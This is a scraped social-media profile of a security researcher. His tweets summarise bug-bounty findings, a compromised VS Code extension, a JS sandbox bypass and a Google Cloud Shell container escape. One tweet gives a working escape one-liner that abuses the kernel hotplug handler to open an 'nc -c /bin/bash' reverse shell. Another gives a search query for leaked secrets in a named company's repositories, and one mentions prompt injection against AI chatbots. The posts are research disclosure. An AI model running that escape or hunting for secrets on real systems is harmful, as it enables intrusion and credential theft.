Bipin Jitiya

337 posts

Bipin Jitiya banner
Bipin Jitiya

Bipin Jitiya

@win3zz

Founder of @Cuberks. Maker, hacker, security researcher. Love nature and psithurism. Tweets mostly about hacking, tech, entrepreneurship, and other geeky stuff.

Ahmadabad City, India Katılım Ocak 2014
146 Takip Edilen7.8K Takipçiler
Sabitlenmiş Tweet
Bipin Jitiya
Bipin Jitiya@win3zz·
As I previously promised I would publish a writeup on how I managed to find the SSRF bug on the biggest social media website, Facebook. So I wrote a blog about that finding. I hope you like it. 🍷 #BugBounty #Infosec link.medium.com/smZtjTvTV6
English
66
646
1.8K
0
Bipin Jitiya
Bipin Jitiya@win3zz·
CVE-2026-28353: Trivy VSCode ext v1.8.12 pwned. GitHub Actions misconfig → PAT stolen → attacker pushed malicious build to OpenVSX. Payload scrapes env secrets, creds, API keys & code via local AI agents → exfil to C2. CVSS 10.0 crit. Uninstall ASAP, rotate all keys
Bipin Jitiya tweet media
English
1
1
23
1.8K
Bipin Jitiya
Bipin Jitiya@win3zz·
Sandbox bypass → arbitrary code exec → OS cmd exec in GenAI dev platform. Found js.map, used SourceMapper to extract JS, analysed logic, used prototype pollution + object traversal to bypass. Got creds incl private keys, cloud, GitHub, DB, mail, other secrets.
Bipin Jitiya tweet media
English
5
24
258
32.5K
Bipin Jitiya
Bipin Jitiya@win3zz·
Remember this post? I am working on a detailed write-up for it. My last write-up (Google Cloud Shell Container Escape) got an amazing response, so I decided to work on another detailed one. I will publish it tomorrow at 10:30 AM (IST).
Bipin Jitiya@win3zz

Sandbox bypass → arbitrary code exec → OS cmd exec in GenAI dev platform. Found js.map, used SourceMapper to extract JS, analysed logic, used prototype pollution + object traversal to bypass. Got creds incl private keys, cloud, GitHub, DB, mail, other secrets.

English
8
12
139
15.7K
Bipin Jitiya
Bipin Jitiya@win3zz·
As I promised, here is my writeup. RCE via Insecure JS Sandbox Bypass @win3zz/rce-via-insecure-js-sandbox-bypass-a26ad6364112" target="_blank" rel="nofollow noopener">medium.com/@win3zz/rce-vi…
Bipin Jitiya tweet media
English
2
82
485
34K
Bipin Jitiya
Bipin Jitiya@win3zz·
@yangO760305 Do you see any error while running: ip link add xyz type dummy OR ip link add xyz type tun?
English
0
0
0
411
yang O
yang O@yangO760305·
@win3zz How do I use hotplug to escape containers? I can't reproduce it locally.
English
1
0
0
464
Bipin Jitiya
Bipin Jitiya@win3zz·
New writeup! Google Cloud Shell Container Escape @win3zz/google-cloud-shell-container-escape-b69ffb46b5df" target="_blank" rel="nofollow noopener">medium.com/@win3zz/google…
English
3
50
265
39.3K
Bipin Jitiya
Bipin Jitiya@win3zz·
@win3zz/google-cloud-shell-container-escape-b69ffb46b5df" target="_blank" rel="nofollow noopener">medium.com/@win3zz/google…
ZXX
0
1
1
418
Bipin Jitiya
Bipin Jitiya@win3zz·
echo $'#!/bin/sh\nnc -c /bin/bash '$(hostname -I|awk '{print $1}')' 9001' | sudo tee /shell > /dev/null && sudo chmod +x /shell; echo "$(mount|grep upper|sed -E 's/.*upperdir=([^,]+).*/\1/')/shell" | sudo tee /proc/sys/kernel/hotplug > /dev/null; sudo ip link add test0 type dummy
English
1
0
3
415
Bipin Jitiya
Bipin Jitiya@win3zz·
Every end is a new beginning
Bipin Jitiya tweet media
English
1
0
11
1.5K
Bipin Jitiya
Bipin Jitiya@win3zz·
Two words: keep going.
English
0
1
3
625
Bipin Jitiya
Bipin Jitiya@win3zz·
Scan Git orgs 4 secrets: /(?i)(password|passwd|pwd|secret|token|apikey|api_key|access_key|secret_key|access_token|api_secret|apiSecret|app_secret|application_key|app_key|appkey|auth_token|authsecret)\s*=\s*["'][^"']{4,}["']/ AND org:adobe AND NOT language:Markdown NOT is:archived
Bipin Jitiya tweet media
English
4
62
310
15.5K
Bipin Jitiya
Bipin Jitiya@win3zz·
@retweet_Winn It needs human reasoning, context, and logic to understand how models interpret language, policies, and intent
English
0
0
0
38
Bipin Jitiya
Bipin Jitiya@win3zz·
Prompt injection, chaining for multi-stage exfiltration, SSRF, Auth Token Leak, AI Chatbot Testing
Bipin Jitiya tweet mediaBipin Jitiya tweet media
English
7
23
211
15.1K

Keşfet

@Saran00013 @ayadim_ @skulldentist @p3n73st3r @yangO760305 @imranhossain404 @elonmusk @BarackObama